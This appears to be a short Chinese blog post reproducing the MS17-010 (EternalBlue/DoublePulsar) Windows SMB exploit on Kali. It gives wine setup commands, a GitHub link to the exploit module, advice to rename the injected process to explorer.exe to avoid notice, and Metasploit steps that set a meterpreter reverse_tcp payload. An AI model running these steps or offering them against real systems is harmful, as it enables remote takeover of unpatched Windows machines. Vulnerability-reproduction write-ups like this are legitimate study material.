ctf及漏洞复现

MS17-010的利用

2017-05-01  本文已影响0人  FateKey

前言

MS17-010是什么想必大家都不陌生了,前段时间Shadow Broker披露的 Windows漏洞,影响Windows 7和Windows Server 2008大部分版本系统。最近一直没啥时间试试,今天晚上终于找到了合适的时间。

参考了两篇文章

1.http://www.freebuf.com/articles/system/132274.html

2.http://www.freebuf.com/articles/system/132813.html

这两篇文章的方法都需要Python2.6  和 pywin32环境,感觉有些麻烦...这里使用kali来进行MS17-010的利用

1.下载EXP

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2.配置环境

64位:

dpkg --add-architecture i386

apt-get update

apt-get install lib32z1 lib32ncurses5

apt-get install wine32

wine cmd.exe

32位:

wine cmd.exe

(吐槽一下,感觉64位配置环境的时间都够下个32位安上了)

3.修改下载的eternalblue_doublepulsar.rb

1.改路径

将/root/Eternalblue-Doublepulsar-Metasploit/deps/改为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps

2.改进程名称

默认进程名称为wlms.exe,建议修改为explorer.exe


3.将文件名称改为方便的名称(我改为了ms17-010.rb)

4.将文件复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/smb/

4.开始利用exp

1.打开msf

2.加载exp

use exploit/windows/smb/ms17-010

3.建立payload

set payload windows/x64/meterpreter/reverse_tcp

4.配置参数

这里就不详细说了,不会的百度

5.执行

成功


上一篇下一篇

猜你喜欢

热点阅读